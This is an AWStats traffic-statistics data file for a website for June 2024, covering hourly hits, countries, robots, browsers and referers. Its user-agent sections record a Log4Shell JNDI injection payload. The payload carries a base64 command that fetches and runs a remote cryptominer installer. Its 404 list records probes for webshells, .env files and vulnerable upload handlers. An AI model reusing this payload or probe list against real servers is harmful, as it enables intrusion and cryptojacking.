AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202406 will be lost/reset.
# Last config file used to build this data file was /home/z1h9uk8mq9i3/tmp/awstats/awstats.proditelsas.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2016                
POS_TIME 2697                
POS_VISITOR 25253               
POS_DAY 54781               
POS_DOMAIN 3585                
POS_LOGIN 4435                
POS_ROBOT 4590                
POS_WORMS 5416                
POS_EMAILSENDER 5547                
POS_EMAILRECEIVER 5690                
POS_SESSION 55636               
POS_SIDER 55840               
POS_FILETYPES 5825                
POS_DOWNLOADS 6103                
POS_OS 6295                
POS_BROWSER 6725                
POS_SCREENSIZE 9947                
POS_UNKNOWNREFERER 10021               
POS_UNKNOWNREFERERBROWSER 11575               
POS_ORIGIN 12690               
POS_SEREFERRALS 12835               
POS_PAGEREFS 13065               
POS_SEARCHWORDS 14719               
POS_KEYWORDS 14901               
POS_MISC 2361                
POS_ERRORS 14992               
POS_CLUSTER 4291                
POS_SIDER_404 15148               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20240701002432 202 42360 7757944152882
FirstTime 20240601005337
LastTime 20240630235132
LastUpdate 20240701060118 202 0 201 0 0
TotalVisits 912                 
TotalUnique 752                 
MonthHostsKnown 0                   
MonthHostsUnknown 769                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
JavascriptDisabled 0 0 0
AddToFavourites 0 0 0
PDFSupport 0 0 0
DirectorSupport 0 0 0
JavaEnabled 0 0 0
RealPlayerSupport 0 0 0
FlashSupport 0 0 0
TotalMisc 0 0 0
WindowsMediaPlayerSupport 0 0 0
QuickTimeSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 99 113 2486600 85 112 106192
1 37 37 145801 91 113 131367
2 39 75 4774019 71 96 207643
3 33 81 7165606 57 83 259563
4 58 76 2605677 94 136 289725
5 37 53 10561908 84 115 223443
6 56 162 16499011 79 119 648533
7 78 189 16740968 122 160 273038
8 90 208 16243430 108 160 847509
9 67 209 47426450 91 122 79807
10 56 160 21137060 114 147 560451
11 46 74 4829504 79 105 1268776
12 64 133 22735252 73 112 290873
13 117 263 33164255 87 139 407966
14 147 238 18861021 76 125 431973
15 72 145 16037603 73 106 284187
16 105 134 5345147 98 136 456629
17 68 177 26087105 79 95 506277
18 51 68 3606575 48 74 135752
19 57 78 12412774 62 114 283918
20 56 74 14844046 156 206 2609958
21 53 67 2579339 54 99 459285
22 40 68 4783076 84 123 408252
23 68 82 2538592 70 103 222894
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 43
us 597 854 67883340
ar 218 556 67553152
co 78 629 133136876
cn 67 71 237623
de 66 66 132944
it 66 80 2415103
ru 60 81 2851221
kr 53 53 43805
tr 52 52 42068
in 50 64 2383173
ca 47 62 2480892
gb 30 30 127459
au 22 24 155230
jp 22 22 93808
fr 18 18 90629
nl 17 17 42243
ro 15 15 88063
bg 14 14 225758
be 14 14 25146
bo 14 85 18305772
es 13 41 4582947
cz 10 10 126622
sc 6 6 81572
sa 6 6 81572
se 6 6 25584
pe 2 16 2286184
hn 3 3 8247
ie 2 2 5498
br 1 1 3916
mx 2 25 4556896
cl 2 2 5498
il 1 3 39139
hu 1 1 17038
ao 2 2 5498
bd 1 1 2749
kz 2 2 23748
ec 0 2 1049029
mn 2 2 8318
zz 2 2 5821
gr 4 4 13601
th 1 1 3916
ua 4 18 2293668
na 1 1 3916
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 18
Googlebot/ 538 3770277 20240630225547 0
AhrefsBot/ 133 2150117 20240630212112 0
Go\-http\-client/ 122 210909 20240630221338 8
bingbot/ 82 1402713 20240630173926 0
Applebot/ 37 230963 20240628162006 0
BLEXBot/ 30 98833 20240626014429 0
link 20 67990 20240630115243 0
no_user_agent 16 261961 20240629212522 0
curl 8 30396 20240625230413 0
facebookexternalhit/ 7 164134 20240619123630 0
bot[\s_+:,\.\;\/\\-] 7 2268941 20240627152240 0
MJ12bot/ 6 21364 20240629220817 0
Googlebot\-Image/ 5 19233 20240627083643 0
Barkrowler 4 12009 20240623220936 0
SemrushBot/ 3 13833 20240626190309 0
java 2 3474 20240617051810 0
crawl 1 4264 20240618065809 0
(firefox/)([0-9]\.|[0-1][0]\.) 1 0 20240603221251 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 11
staff 3 108 0 0
pdf 11 3877540 0 0
php 1164 3348684 0 0
jpg 473 174348340 0 0
png 244 124574289 0 0
html 377 2406153 0 0
Unknown 49 84537 0 0
gif 14 1513 0 0
css 223 368078 0 0
js 405 4534575 0 0
queue 1 1465 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 5
/ficha%20tecnica.pdf 7 2 3302310
/contrato.pdf 4 0 1672769
/disponibilidad.pdf 3 0 555101
/Decreto%20067.pdf 2 0 13648
/atencion.pdf 2 0 370538
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 26
androidmarshmallow 2 0
ios_iphone 178 70
winnt 5 4
androidkitkat 3 3
macosx7 9 9
win8 21 7
winlong 5 5
macosx12 3 3
win10 1536 756
macosx9 7 7
androidnougat 1 1
android 76 11
ios_ipad 3 3
macosx14 1 1
win8.1 11 11
winxp 11 11
win7 76 71
win2003 1 1
linuxubuntu 29 29
macosx15 142 73
unix 15 1
linux 102 58
android10 290 37
macosx 63 60
macosx6 1 1
Unknown 375 361
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 154
opera11.52 1 1
opera20.0.1387.64 1 1
chrome103.0.5060.66 2 2
chrome58.0.3029.110 4 4
chrome74.0.3729.169 25 25
safari16.2 1 1
chrome109.0.0.0 5 5
safari4.0 15 1
chrome83.0.4103.61 6 2
chrome66.0.3359.181 1 1
chrome66.0.3359.117 6 6
firefox102.0 2 2
msie7.0 1 1
firefox127.0 15 1
safari16.6.1 10 2
chrome114.0.5814.214 3 3
chrome30.0.1599.13014 3 3
chrome80.0.3987.162 1 1
opera89.0.4447.51 34 34
chrome52.0.2762.73 4 4
chrome107.0.1370 1 0
chrome89.0.518 1 1
chrome75.0.2657 1 1
safari17.2 3 1
firefox27.0 9 9
safari15.4 12 12
chrome126.0.0.0 350 31
chrome100.0.4896.60 3 3
firefox112.0 2 0
safari17.3.1 1 1
chrome47.0.2526.111 1 1
chrome10.0.613.0 1 1
chrome76.0.3809.132 1 1
chrome11.0.696.65 15 1
chrome123.0.0.0 39 6
safari7.0 2 2
chrome56.0.2924.87 3 3
chrome75.0.1676 1 0
chrome101.0.4951.64 4 4
msie9.0 15 1
chrome79.0.3945.79 15 1
chrome75.0.3770.100 1 1
chrome77.0.652 1 1
firefox109.0 16 2
chrome17.0.963.56 9 9
chrome60.0.3112.107 1 1
chrome87.0.4280.88 3 1
chrome88.0.4324.190 3 3
chrome44.0.2403.157 1 1
opera108.0.0.0 1 1
firefox122.0 1 1
opera109.0.0.0 62 29
opera53.0.2907.99 3 3
chrome32.0.1700.102 9 9
chrome103.0.0.0 6 6
chrome101.0.4951.67 5 5
chrome98.0.4758.80 1 1
chrome33.0.1750.117 4 4
chrome65.0.3152.119 4 4
chrome104.0.5112.79 7 1
mozilla 90 76
chrome98.0.2968 1 1
chrome119.0.0.0 3 3
chrome117.0.5938.132 18 4
chrome80.0.3987.163 15 1
chrome19.0.1084.9 1 1
safari15.5 2 2
chrome106.0.0.0 2 2
chrome34.0.1847.131 1 1
netscape5.0 13 13
chrome71.0.2623.112 9 9
chrome63.0.3239.132 5 5
chrome62.0.3202.94 1 1
chrome125.0.6422.175 1 0
chrome66.0.975 1 0
firefox114.0 41 41
chrome59.0.3071.104 4 4
chrome85.0.4183.83 1 1
chrome91.0.4472.114 2 2
safari 75 9
chrome79.0.3945.88 1 1
chrome78.0.3904.108 68 68
android 3 3
safari16.6 1 1
opera19.0.1326.63 2 2
safari17.1.2 1 1
msie11.0 2 2
chrome112.0.0.0 11 5
safari7.0.1 2 2
firefox26.0 5 5
chrome60.0.3112.113 65 65
chrome32.0.1700.107 4 4
opera110.0.0.0 183 152
chrome122.0.0.0 42 12
safari9.0 1 1
chrome30.0.1599.12785 5 5
firefox116.0 1 1
chrome105.0.0.0 1 1
chrome96.0.4664.110 5 5
chrome58.0.3073.63 1 1
chrome85.0.1692 1 0
firefox125.0 1 1
opera19.0.1326.59 1 1
safari17.2.1 32 9
chrome118.0.0.0 1 1
chrome104.0.0.0 5 5
chrome109.0.5414.120 5 4
chrome126.0.6478.47 19 3
chrome88.0.4240.193 3 3
safari12.0.2 1 1
opera12.15 2 2
chrome63.0.3239.84 6 6
opera111.0.0.0 4 4
chrome115.0.0.0 1 1
safari17.5 46 6
safari1.0.3 1 1
chrome88.0.4324.192 1 1
firefox115.0 11 11
safari13.0.3 51 51
chrome68.0.3440.106 3 3
chrome92.0.4515.159 6 6
chrome89.0.4389.114 13 13
edge44 6 6
firefox126.0 15 1
chrome103.0.5060.114 2 2
chrome125.0.6422.168 1 0
firefox118.0 1 1
chrome121.0.0.0 36 32
chrome114.0.0.0 129 129
chrome108.0.0.0 68 68
chrome110.0.0.0 29 15
firefox111.0 1 1
chrome114.0.5735.289 3 3
chrome94.0.4606.61 9 9
chrome97.0.4692.71 1 1
opera12.16 2 2
chrome55.0.3063.70 1 1
firefox115 1 1
chrome33.0.1750.146 1 1
chrome77.0.3865.120 1 1
chrome120.0.0.0 30 16
chrome124.0.0.0 31 24
Unknown 275 275
chrome100.0.4896.127 15 1
safari12.0 1 1
safari16.1 1 1
chrome67.0.3396.99 3 3
firefox124.0 3 3
chrome67.0.3396.79 3 3
firefox123 1 1
chrome107.0.0.0 1 1
msie10.0 1 1
chrome125.0.0.0 630 79
msie6.0 2 2
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 16
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20240630203808
Python/3.10_aiohttp/3.9.4 20240603043949
Python/3.10_aiohttp/3.9.5 20240624205107
Mozilla/5.0 20240626050837
Mozilla/5.0_zgrab/0.x 20240619233407
req/v3_(https://github.com/imroc/req) 20240616031538
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20240629115203
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.12.245.132:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20240618143354
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20240630235132
Openwave/_UCWEB7.0.2.37/28/999 20240616010200
python-requests/2.31.0 20240630090230
python-requests/2.12.4 20240630140656
Mozilla/5.0_(compatible;_ips-agent) 20240630013013
Mozilla/5.0_(compatible;_Odin;_https://docs.getodin.com/) 20240628232303
GoogleOther 20240628005259
Mozilla/5.0_(compatible;_Dataprovider.com) 20240613213100
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 9
python-requests/2.12.4 20240630140656
python-requests/2.31.0 20240630090230
req/v3_(https://github.com/imroc/req) 20240616031538
GoogleOther 20240628005259
Openwave/_UCWEB7.0.2.37/28/999 20240616010200
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.12.245.132:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20240618143354
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20240630203808
Python/3.10_aiohttp/3.9.4 20240603043949
Python/3.10_aiohttp/3.9.5 20240624205107
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 761 803
From1 2 2
From2 66 67
From3 300 300
From4 465 1794
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
search_yahoo_catchall 2 2
www_bing_com 5 5
www_google_com 57 58
www_google_com_co 2 2
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 32
http://181.225.72.214:8080 211 211
http://181.225.72.214:8080/actuator/gateway/routes 28 28
http://181.225.72.214:8080/favicon.ico 10 10
http://181.225.72.214:8080/js/NewWindow_2_all.js 5 5
http://181.225.72.214:8080 5 5
http://181.225.72.214:8080/robots.txt 3 3
http://181.225.72.214:8080/sitemap.xml 3 3
http://181.225.72.214:8080/static/historypage.js 2 2
http://181.225.72.214:8080/showLogin.cc 2 2
http://181.225.72.214:8080/api/session/properties 2 2
http://181.225.72.214:8080/webfig/ 2 2
http://181.225.72.214:8080/cgi-bin/authLogin.cgi 2 2
http://181.225.72.214:8080/login 2 2
http://181.225.72.214:8080/wp-content/plugins/elementor/readme.txt 2 2
http://181.225.72.214:8080/Telerik.Web.UI.WebResource.axd 2 2
http://181.225.72.214:8080/zabbix/favicon.ico 2 2
http://181.225.72.214:8080/WebInterface/ 2 2
http://181.225.72.214:8080/script 1 1
http://181.225.72.214:8080/api/sonicos/auth 1 1
http://181.225.72.214:8080/api/sonicos/tfa 1 1
http://181.225.72.214:8080/owncloud/status.php 1 1
http://www.tommysautomotivecare.com 1 1
http://181.225.72.214:8080/auth1.html 1 1
http://181.225.72.214:8080/phpmyadmin/index.php 1 1
http://181.225.72.214:8080/auth.html 1 1
http://181.225.72.214:8080/wp-content/plugins/wpschoolpress/readme.txt 1 1
https://l.wl.co 1 1
http://181.225.72.214:8080/wp-content/plugins/wp-central/readme.txt 1 1
http://181.225.72.214:8080/cluster/cluster/ 1 1
http://181.225.72.214:8080/sslvpnLogin.html 1 1
https://l.facebook.com 1 1
http://181.225.72.214:8080/status.php 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 1
http+//www.proditelsas.com/ 2
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 2
//www.proditelsas.com/ 2
http 2
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 7
302 196 782
101 25 0
206 1 3062
201 8 569
422 228 655501
404 1213 0
301 11 2686
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 303
//wp-content/themes/seotheme/mar.php 1 -
/wp-includes/blocks/index.php 1 -
/wp-content/plugins/about.php 1 -
/admin/fileman/php/upload.php 2 -
/admin/jQuery-File-Upload/server/php/index.php 1 -
/wp-includes/style-engine/index.php 1 -
/extplorer/index.php 1 -
/assets/admin/plugins/plupload/examples/upload.php 1 -
/js/fileman/asp_net/main.ashx 1 -
/wp-content/plugins/pwnd/pwnd.php 2 -
/edit.php 1 -
/admin/assets/plugins/jQuery-File-Upload/server/php/index.php 1 -
/wp-includes/block-supports/index.php 1 -
/wp-content/themes/twentystd/index.php 1 -
/plugins/elfinder/connectors/php/connector.php 1 -
/assets/plugins/jQuery-File-Upload/server/php/index.php 1 -
/wp-admin/user/index.php 1 -
/wp-content/plugins/include.php 12 -
/wp.php 3 -
/alfanew.php 1 -
/js/tinymce/plugins/fileman/php/upload.php 1 -
/wp-admin/css/colors/blue/blue.php 2 -
/admin/ckeditor/plugins/fileman/php/upload.php 1 -
/comments/feed/ 4 -
/wp-content/plugins/fix/up.php 2 -
/assets/js/fuck.js 1 -
//wp-content/plugins/ccx/index.php 1 -
/bc 19 -
/admin/assets/plugins/plupload/examples/upload.php 1 -
/admin/ckeditor/fileman/php/upload.php 1 -
/wp 19 -
/wp-admin/ 2 -
/wp-content/plugins/royal-elementor-addons/readme.txt 1 -
/.well-known/security.txt 2 -
/static/sspanel/css/sspanel.css 1 -
/test.php 1 -
/2018/wp-includes/wlwmanifest.xml 4 -
/wp-content/plugins/google-seo-rank/module.php 1 -
/wp-content/themes/admin.php 1 -
/wp-admin/includes/index.php 2 -
/wp-includes/pomo/index.php 1 -
/wp-admin/maint/plugins.php 2 -
/wp-content/themes/ 1 -
/wp-admin/maint/ 3 -
/fileman/php/upload.php 2 -
/wp-admin/network/index.php 1 -
/sftp-config.json 4 -
/style.php 2 -
/geju.php 1 -
/wp-admin/meta/index.php 1 -
/wp-content/themes/include.php 1 -
/wp-content/themes/index.php 2 -
/wp-includes/rest-api/index.php 2 -
/wordpress/wp-content/plugins/google-seo-rank/README.txt 1 -
/wp-head.php 4 -
/wordpress/wp-login.php 1 -
/home 19 -
/wp-includes/fonts/index.php 1 -
/hoot.php 1 -
/wordpress/xmlrpc.php 1 -
/axis2-admin/ 4 -
/.well-known/ 4 -
/wordpress 19 -
/blog/wp-login.php 1 -
/comida/atencion.pdf 3 -
/ckeditor/fileman/php/upload.php 1 -
/media/wp-includes/wlwmanifest.xml 4 -
/wp-content/plugins/uncode-core/includes/assets/js/uncode-featured-images.js 1 -
/manager/assets/modext/license.txt 2 -
/wp-admin/maint/wp-login.php 2 -
/ads.txt 4 -
/wp-includes/widgets/index.php 1 -
/.env 3 -
/install.php 1 -
/wp-json/custom-admin/v1/ 1 -
/fw.php 1 -
/wp-content/plugins/wordpress-seo/index.php 1 -
/admin/plugins/plupload/examples/upload.php 1 -
/wp-2019.php 1 -
/news/wp-includes/wlwmanifest.xml 10 -
/themes.php 3 -
/wp-includes/widgets/include.php 2 -
/wp-includes/css/index.php 1 -
/cobertura/informacion_crc.php 1 -
/wp-ldd.php 1 http://www.google.com
//wp-content/updates.php 1 -
/wp-admin/includes/ 1 -
/backup 19 -
/blog.php 1 -
/wp-admin/user/ 3 -
/shell.php 1 -
/wp-content/db-cache.php 1 -
/lib/fileman/php/upload.php 1 -
/web/wp-includes/wlwmanifest.xml 10 -
/updates.php 1 -
/site/wp-login.php 1 -
/xmrlpc.php 1 -
/wp-includes/PHPMailer/index.php 1 -
/content.php 1 -
/wp-content/plugins/wp-catcher/index.php 7 www.google.com
/wp-content/plugins/inquiry-form-creator/js/messages_ja.js 2 -
/wp-admin/css/index.php 2 -
/wp-includes/php-compat/index.php 2 -
/sitemap_index.xml.gz 2 -
/assets/server/php/index.php 1 -
/wp-content/upgrade/ 2 -
/wp-content/plugins/admin.php 1 -
/wp-conflg.php 1 -
/dropdown.php 3 -
/axis2/ 4 -
/main 19 -
/wp-includes/Requests/index.php 1 -
/.vscode/sftp.json 4 -
/robots.txt 234 -
/admin/jquery_uploader/server/php/index.php 1 -
/goods.php 1 -
/wp-includes/SimplePie/index.php 1 -
/wp-content/plugins/easy-login-woocommerce/admin/assets/js/xoo-el-admin-js.js 1 -
/ss.php 8 www.google.com
/wp-content/themes/twentytwenty/inc/footer.php 1 -
/wp-aa.php 2 -
/blog/wp-includes/wlwmanifest.xml 10 -
/wp1/wp-includes/wlwmanifest.xml 10 -
/assets/backend/plugins/jquery-file-upload/server/php/index.php 1 -
/wp-content/plugins/woocommerce/uninstall.php 1 -
/doc.php 1 -
/assets/editor/fileman/php/upload.php 1 -
/wp-includes/sodium_compat/index.php 1 -
/mail.php 1 -
/simple.php 5 -
/wp-login.php 117 http://proditelsas.com/wp-login.php
/site/wp-includes/wlwmanifest.xml 10 -
/pqr/view.php 1 -
/wp-content/ 4 -
/wp-content/admin.php 1 -
/wp-admin/meta/ 3 -
/theme/assets/plugins/jquery-file-upload/server/php/index.php 1 -
/theme/zero/assets/js/scripts.bundle.js 1 -
//wp-includes/css/buttons.css 1 -
/media/system/js/core.js 5 -
/bk 19 -
/server/php/index.php 1 -
/new 19 -
/wp-content/inputs.php 1 -
/shop/wp-includes/wlwmanifest.xml 10 -
/assets/jQuery-File-Upload/server/php/index.php 1 -
/wp-includes/index.php 2 -
/website/wp-includes/wlwmanifest.xml 10 -
/wp-includes/customize/index.php 1 -
//wp-content/themes/ccx/index.php 1 -
/old 19 -
/wp-includes/ID3/index.php 2 -
/theme/assets/global/plugins/jquery-file-upload/server/php/index.php 1 -
/wp-content/plugins/seoplugins/mar.php 2 -
/archivarix.cms.php 2 http://proditelsas.com/archivarix.cms.php
/wp-content/plugins/pwnd-1/pwnd.php 1 -
//wp-content/themes/seotheme/db.php 1 -
//templates/beez3/index.php 1 -
/cms/wp-includes/wlwmanifest.xml 10 -
/pqr/open.php 1 -
/log.php 1 -
/repeater.php 1 -
/as.php 1 -
/ini.php 1 -
/wp-includes/inputs.php 1 -
/images/ 1 -
/public/assets/plugins/plupload/examples/upload.php 1 -
/wp-content/themes/twentytwentytwo/inc/footer.php 1 -
/plupload/examples/upload.php 1 -
/wp/wp-includes/wlwmanifest.xml 10 -
/wp-includes/sitemaps/index.php 1 -
/fileman/asp_net/main.ashx 1 -
/cobertura/pqr/disponibilidad.pdf 1 -
/wp-content/plugins/bp-cover/js/bp-cover-group.js 1 -
/sitemaps.xml 4 -
/js/ckeditor/fileman/php/upload.php 1 -
/wp/wp-login.php 1 -
/sitemap 2 -
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 -
/tinymce/plugins/fileman/php/upload.php 1 -
/wordpress/wp-includes/wlwmanifest.xml 10 -
/wp-includes/certificates/index.php 2 -
/reservas/caracteristicas.php 1 -
//wp-content/plugins/seoplugins/db.php 1 -
/wp-includes/Text/index.php 3 -
/wp-includes/js/index.php 1 -
/admin/elfinder/src/connectors/php/connector.php 1 -
/sitemap.ashx 2 -
/wp-content/plugins/WordPressCore/include.php 19 -
/cobertura/residenciales.php 1 -
/Ley%20679%20de%202001.pdf 1 -
/sitemap.xml.gz 4 -
/admin/assets/global/plugins/plupload/examples/upload.php 1 -
/404.php 1 -
/admin/server/php/index.php 1 -
/ws.php 1 -
/cobertura/control.php 1 -
/wp-content/plugins/core-plugin/include.php 8 -
/new/xmlrpc.php 1 -
/wp-content/themes/seotheme/mar.php 2 -
/wp-content/plugins/coming-soon/coming-soon.php 1 -
/old/xmlrpc.php 1 -
/xmlrpc.php 13 -
/sitemap.xml 10 -
/wp-includes/random_compat/index.php 1 -
/ckeditor/plugins/fileman/php/upload.php 1 -
/jquery-file-upload/server/php/index.php 1 -
/wp-includes/certificates/plugins.php 2 -
/wp-content/plugins/google-seo-rank/README.txt 2 -
/assets/global/plugins/plupload/examples/upload.php 1 -
/wp-admin/maint/index.php 4 -
/wp-includes/block-patterns/index.php 1 -
/wp-admin/images/index.php 1 -
/wp-admin/css/ 3 -
/ayk.php 1 -
/admin/fileman/asp_net/main.ashx 1 -
/humans.txt 1 -
/reset.php 1 -
/blog/wp-content/plugins/google-seo-rank/README.txt 1 -
/pass.php 1 -
/plugins/fileman/php/upload.php 1 -
/theme/v2board/assets/umi.css 3 -
/sitemap.txt 4 -
/moon.php 1 -
/wp-includes/ 4 -
/wp-admin/network/ 3 -
/wp-content/plugins/ 2 -
/2020/wp-includes/wlwmanifest.xml 6 -
/site/wp-content/plugins/google-seo-rank/README.txt 1 -
/assets/plugins/summernote/upload.php 1 -
/assets/admin/plugins/elfinder/connectors/php/connector.php 1 -
/about.php 4 -
/admin.php 3 -
/wp-includes/theme-compat/index.php 1 -
/security.txt 1 -
/wp/xmlrpc.php 1 -
/wp-admin/user/news.php 2 -
/js/fileman/php/upload.php 1 -
/cobertura/caracteristicas.php 1 -
/wp-content/uploads/inputs.php 1 -
/atomlib.php 3 -
/blogs/wp-login.php 1 -
/assets/ 1 -
/plugins.php 1 -
/wp-content/index.php 2 -
/radio.php 2 -
/css.php 1 -
/assets/plugins/plupload/examples/upload.php 1 -
/wp-activate.php 1 -
/wp-content/style.php 1 -
/wp-includes/css/buttons.css 5 -
//wp-content/themes/pridmag/db.php 1 -
/_profiler/empty/search/results 1 -
/wp-content/plugins/elementor/elementor.php 1 -
/feed/ 4 -
/wp-content/plugins/wp-theme-editor/include.php 3 -
/emergency.php 1 -
/wp/wp-content/plugins/google-seo-rank/README.txt 1 -
/wp-includes/wlwmanifest.xml 10 -
/wp-ver.php 18 -
/wp-includes/IXR/index.php 1 -
/admin/plugins/jquery-file-upload/server/php/index.php 1 -
/axis2/axis2-admin/ 4 -
/wp-content/uploads/ 4 -
/inputs.php 4 -
/.well-known/pki-validation/wp-login.php 1 -
/theme/assets/jquery-file-upload/server/php/index.php 1 -
/public/plugins/plupload/examples/upload.php 1 -
/js/_system/jQuery-File-Upload/server/php/index.php 1 -
/wp-content/themes/twentystd/ 1 -
/vendor/phpunit/phpunit/src/Util/PHP/ 2 -
/wp-checkbex.php 2 -
/wp-content/plugins/incache/index.php 1 www.google.com
/wp-includes/images/include.php 12 -
//wp-content/plugins/fix/up.php 1 -
/wp-content/plugins/wp-ver.php 2 -
/wp-content/install.php 1 -
/upfile.php 1 -
/wp-content/themes/twentyseven/index.php 1 -
/bypass.php 1 -
/plugins/plupload/examples/upload.php 1 -
/pqr/procedimientos.php 1 -
/wp-admin/images/ 3 -
/.well-knownold/ 2 -
/2019/wp-includes/wlwmanifest.xml 10 -
/wp-add.php 2 http://www.google.com
/mambots/editors/fckeditor/editor/filemanager/upload/php/upload.php 1 -
/wp-content/plugins/index.php 2 -
/lufix.php 1 -
/wp-includes/images/index.php 2 -
/wp-includes/assets/index.php 1 -
//wp-content/plugins/seoplugins/mar.php 1 -
//wp-content/plugins/linkpreview/db.php 1 -
/sito/wp-includes/wlwmanifest.xml 10 -
/blog/xmlrpc.php 1 -
/cgi-bin/ 1 -
/theme/Bob-Theme-Argon/js/chunk-vendors.3a585bb2.js 1 -
/chosen.php 2 -
/test/wp-includes/wlwmanifest.xml 10 -
/wp2/wp-includes/wlwmanifest.xml 10 -
/wp-admin/admin-ajax.php 9 -
/sitemap_index.xml 4 -
/plugins/jQuery-File-Upload/server/php/index.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 769
181.119.64.134 201 452 41005383 20240630182022
71.25.131.194 59 59 47731 20240630140656
2.229.121.232 57 57 46113 20240611001954
83.97.73.245 56 56 45304 20240630065234
78.186.151.102 52 52 42068 20240627162212
211.37.177.27 52 52 42068 20240629142723
186.81.124.9 23 39 2329435 20240628093900
184.185.2.12 16 16 189984 20240626151921
185.180.143.140 15 15 12135 20240611210031
45.156.129.110 15 15 12135 20240622195643
144.126.131.216 14 14 38486 20240630180238
186.121.194.11 10 25 9178092 20240607135649
149.56.160.227 10 10 135762 20240613213047
185.91.69.110 9 9 15633 20240620160004
206.217.128.98 9 9 7281 20240626050837
85.209.11.117 6 6 81572 20240625190227
146.190.103.193 6 6 102228 20240606224029
172.225.238.97 6 22 13424653 20240624135938
115.231.78.12 6 6 8566 20240621005905
